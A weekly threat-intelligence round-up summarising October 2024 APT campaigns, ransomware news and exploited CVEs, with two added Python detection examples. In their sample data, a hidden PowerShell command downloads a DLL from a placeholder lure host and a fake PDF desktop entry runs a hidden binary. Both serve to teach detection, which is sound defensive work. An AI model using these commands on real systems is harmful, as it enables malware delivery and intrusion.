Weekly Cyber Round-up

Intelligence Report

October 3, 2024

Patchwork APT targets Chinese entities with Nexe backdoor

Cyble researchers identified an ongoing campaign by the Patchwork advanced persistent threat (APT) actor, likely aimed at Chinese entities, that delivers a new backdoor, dubbed Nexe. As the initial infection vector, the threat actor utilises a malicious LNK file that is likely delivered via phishing emails. The file executes a PowerShell script that downloads two files: a PDF lure and a malicious DLL. The campaign uses DLL sideloading to execute the downloaded DLL, which decrypts and executes shellcode that patches the AmsiScanBuffer and EtwEventWrite APIs and then delivers Nexe. The patching is aimed at evading detection mechanisms so that the malware can operate stealthily. Nexe collects system information such as the process ID, public and private IP addresses, usernames, and more.
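A defender-side illustration of the chain summarised above, added here as an example (it is not Cyble's code or data): it correlates a PowerShell download launched from explorer.exe (how a double-clicked LNK appears in process telemetry) with a subsequent DLL load from the same user-writable directory as its loader, the classic sideloading layout. The event schema, field names, regexes, correlation window and all sample events are assumptions; the paths and URLs are constructed placeholders, not indicators.

```python
"""Heuristic detection for: LNK -> PowerShell download -> DLL sideloading.
Added example, not Cyble's code. Event dicts loosely resemble Sysmon
process-create and image-load records; everything below is constructed."""
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient"
    r"|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
HIDDEN_HINTS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-noni(nteractive)?\b"
    r"|-enc(odedcommand)?\b", re.I)
STAGING_HINTS = re.compile(
    r"\$env:(temp|appdata|localappdata)|%(temp|appdata)%|\\appdata\\|\\temp\\", re.I)
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|windows\\temp|programdata)\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    return path.rsplit("\\", 1)[0].lower()


def is_lnk_style_powershell(ev):
    """Stage 1: PowerShell spawned by explorer.exe whose command line downloads
    something and either hides its window or stages into a user-writable path."""
    if ev["type"] != "process_create":
        return False
    if basename(ev["image"]) not in POWERSHELL_IMAGES:
        return False
    if basename(ev["parent_image"]) != "explorer.exe":
        return False
    cmd = ev["cmdline"]
    return bool(DOWNLOAD_HINTS.search(cmd)) and bool(
        HIDDEN_HINTS.search(cmd) or STAGING_HINTS.search(cmd))


def looks_like_sideload(ev):
    """Stage 2: a .dll loaded from the same user-writable directory as the
    executable that loads it."""
    if ev["type"] != "image_load":
        return False
    dll = ev["loaded"]
    return (dll.lower().endswith(".dll")
            and USER_WRITABLE.search(dll) is not None
            and dirname(dll) == dirname(ev["image"]))


def detect_chain(events, window_s=300):
    """Raise a stage-2 alert only when a stage-1 hit preceded it on the same host."""
    alerts = []
    stage1 = {}  # host -> most recent stage-1 event
    for ev in sorted(events, key=lambda e: e["ts"]):
        host = ev["host"]
        if is_lnk_style_powershell(ev):
            stage1[host] = ev
            alerts.append({"host": host, "stage": 1, "pid": ev["pid"],
                           "detail": "PowerShell download launched from explorer.exe"})
        elif (looks_like_sideload(ev) and host in stage1
              and ev["ts"] - stage1[host]["ts"] <= window_s):
            alerts.append({"host": host, "stage": 2, "pid": ev["pid"],
                           "detail": f"{basename(ev['image'])} loaded {ev['loaded']}"})
    return alerts


# Constructed sample telemetry (placeholders, not real IoCs).
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "ws01", "ts": 100, "pid": 4200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr http://lure.example.invalid/notice.pdf'
                r' -OutFile $env:TEMP\notice.pdf; iwr http://lure.example.invalid/version.dll'
                r' -OutFile $env:TEMP\upd\version.dll"'},
    {"type": "process_create", "host": "ws01", "ts": 105, "pid": 4300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -c Get-ChildItem"},          # benign interactive use
    {"type": "image_load", "host": "ws01", "ts": 130, "pid": 4400,
     "image": r"C:\Users\alice\AppData\Local\Temp\upd\viewer.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\upd\version.dll"},
    {"type": "image_load", "host": "ws01", "ts": 131, "pid": 900,
     "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\ntdll.dll"},            # normal system load
    {"type": "image_load", "host": "ws02", "ts": 140, "pid": 2100,
     "image": r"C:\Users\bob\Downloads\tool\tool.exe",
     "loaded": r"C:\Users\bob\Downloads\tool\helper.dll"},   # no stage 1 on ws02
]

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(alert)
```

The stage-2 heuristic alone fires on many legitimate portable applications (ws02 above), which is why it is only reported when it follows a stage-1 hit on the same host; the in-memory patching of AmsiScanBuffer and EtwEventWrite is not visible in this kind of telemetry and would need memory-integrity checks in an EDR.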

Bulbature and GobRAT used to turn compromised edge devices into ORBs

Since mid-2023, Sekoia researchers have investigated an infrastructure that consists of edge devices compromised by GobRAT and Bulbature malware. The attackers run Bash scripts that download the malware from deployed staging servers, ultimately transforming targeted devices into Operational Relay Boxes (ORBs) that can launch further attacks. The infrastructure consists of over 75,000 compromised hosts in a total of 139 countries, with the United States, Hong Kong, and Sweden being the most impacted. GobRAT is a remote access trojan (RAT) written in Go that provides 22 types of commands enabling reverse shell operations, distributed denial-of-service attacks, reading and writing files, and more. Bulbature is an implant that is leveraged to transform targeted edge devices into an ORB and relay attacks against final target networks. Bulbature’s behaviour is considered more complex than GobRAT’s. The infrastructure is believed to be used by several threat actors originating from China.

Sparkling Pisces uses KLogEXE and FPSpy to target South Korea and Japan

Palo Alto Networks Unit 42 researchers discovered two previously undocumented malware families, dubbed KLogEXE and FPSpy, used by the North Korean threat actor Sparkling Pisces. KLogEXE is a keylogger written in C++ that collects information on currently running applications, logs keystrokes, and monitors mouse clicks. FPSpy is a backdoor capable of keylogging, as well as storing configuration and system information, downloading and executing additional encrypted modules, and more. Based on code and behavioural similarities, FPSpy appears to be a variant of a malware used in a campaign detailed by ASEC researchers in 2022. The malware also shares characteristics with the KGHSpy backdoor discovered in 2020. Code similarity was also observed between KLogEXE and FPSpy. Most of the observed targets originated from South Korea and Japan.

Transparent Tribe targets India in campaign using Mythic Poseidon binaries

CYFIRMA researchers observed an ongoing campaign, attributed to Transparent Tribe, that is currently targeting India. The researchers identified 15 servers hosting Mythic C2 infrastructure that is associated with ongoing attacks utilising customised payloads, such as Mythic Poseidon binaries. As an initial access vector, Transparent Tribe distributes malicious Linux desktop entry files disguised as PDFs, with the files ultimately used to run malicious binaries that establish persistent access and help evade detection. Transparent Tribe is believed to be increasingly targeting Linux environments due to their widespread use in Indian government sectors. In particular, the Debian-based BOSS OS is used across various ministries and defence forces.
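A triage helper for the delivery mechanism described above, added here as an example (not CYFIRMA's code): it parses Linux desktop entry files and flags entries whose Name or Icon present them as a document while their Exec line invokes a shell, interpreter or downloader or runs something from a hidden or temporary path. The two sample entries, the keyword lists and the two-reason threshold are assumptions; the paths are constructed placeholders, not indicators.

```python
"""Triage of .desktop files disguised as documents. Added example, not
CYFIRMA's code; samples and heuristics below are constructed assumptions."""
import re

DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt)$", re.I)
DOC_ICON = re.compile(r"(pdf|document|office|libreoffice|word|excel)", re.I)
INTERPRETERS = re.compile(r'(^|[\s"\'/])(sh|bash|dash|zsh|python3?|perl|curl|wget|nohup)(\s|$)', re.I)
HIDDEN_OR_TMP = re.compile(r"(/tmp/|/dev/shm/|~/\.|/home/[^/]+/\.|\$HOME/\.)")
KNOWN_VIEWERS = re.compile(r"^(evince|okular|xdg-open|libreoffice|atril|zathura)\b")


def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group. Localised keys
    such as Name[en] are folded onto the base key when the base key is absent."""
    entry, group = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            continue
        if group != "Desktop Entry" or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        key = key.split("[", 1)[0]
        entry.setdefault(key, value)
    return entry


def assess_desktop_entry(text):
    """Score one desktop entry; two or more independent reasons mark it suspicious."""
    e = parse_desktop(text)
    name, icon, exec_ = e.get("Name", ""), e.get("Icon", ""), e.get("Exec", "")
    reasons = []
    if DOC_NAME.search(name):
        reasons.append("Name carries a document extension")
    if DOC_ICON.search(icon) and not KNOWN_VIEWERS.match(exec_):
        reasons.append("document icon but Exec is not a known document viewer")
    if INTERPRETERS.search(exec_):
        reasons.append("Exec invokes a shell, interpreter or downloader")
    if HIDDEN_OR_TMP.search(exec_):
        reasons.append("Exec references a hidden or temporary path")
    return {"name": name, "exec": exec_,
            "suspicious": len(reasons) >= 2, "reasons": reasons}


# Constructed samples: a normal viewer entry and a document-lookalike lure.
BENIGN_ENTRY = """\
[Desktop Entry]
Type=Application
Name=Document Viewer
Icon=org.gnome.Evince
Exec=evince %U
Terminal=false
MimeType=application/pdf;
"""

LURE_ENTRY = """\
[Desktop Entry]
Type=Application
Name=Tender_Notice_2024.pdf
Name[hi]=Tender_Notice_2024.pdf
Icon=application-pdf
Exec=bash -c "$HOME/.local/share/.cache/svc"
Terminal=false
"""

if __name__ == "__main__":
    for sample in (BENIGN_ENTRY, LURE_ENTRY):
        print(assess_desktop_entry(sample))
```

Because desktop entries are honoured wherever a file manager renders them, the same check can be run over ~/Desktop, ~/Downloads and ~/.local/share/applications as a periodic hunt, treating any hit as a file to quarantine and review rather than open.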

Fake Android and iOS mobile trading apps distributed in pig butchering scheme

Since May 2024, Group-IB researchers have identified multiple fake Android and iOS apps, collectively classified under the UniShadowTrade malware family, that are disguised as trading or cryptocurrency platforms and used in pig butchering schemes. Victims are typically lured through dating apps or social networks, with the attackers using social engineering to gain their trust. The apps were developed with the UniApp cross-platform framework and initially distributed via the Google Play and Apple App stores. The attackers began distributing the apps through phishing websites after they were removed from the official stores. Once installed, users are instructed to trust the Enterprise developer profile, register with the app, and follow a set of investment instructions that result in the theft of their funds. The fake apps support English, Portuguese, Chinese, and Hindi, and have targeted victims in the Asia-Pacific, Europe, the Middle East, and Africa.

Ransomware

Volume of blog posts by operators during the last week.

Security Brief: Royal Mail Lures Deliver Open Source Prince Ransomware – Proofpoint US Blog – Oct 02 2024
Is MEOW Ransomware Getting Its Claws Out? – Cyberint – Oct 02 2024
Key Group: another ransomware group using leaked builders – ITSecurityNews.info – Oct 01 2024
LockBit power cut: four new arrests and financial sanctions against affiliates – Europol – Publications & Documents – Oct 01 2024
JPCERT shares Windows Event Log tips to detect ransomware attacks – Bleeping Computer – Sep 30 2024
Storm-0501: Ransomware attacks expanding to hybrid cloud environments – Microsoft Security Blog – Sep 26 2024

High Priority Vulnerabilities

Name             Software           Base Score   Temp Score
CVE-2024-29824   Endpoint Manager   7.3          7.0
  Related: Critical Ivanti RCE flaw with public exploit now used in attacks
CVE-2023-25280   DIR820LA1          9.8          5.3
  Related: SAP, D-Link flaws among 4 added to Known Exploited Vulnerabilities catalog
CVE-2024-34102   Magento            9.8          9.4
  Related: CosmicSting flaw exploited to hack 5% of all Adobe Commerce and Magento stores
CVE-2017-10271   WebLogic Server    9.8          9.4
  Related: Hadooken and K4Spreader: The 8220 Gang’s Latest Arsenal
CVE-2024-27956   Automatic Plugin   9.9          7.1
  Related: Cyble Honeypot Sensors Detect WordPress Plugin Attack, New Banking Trojan
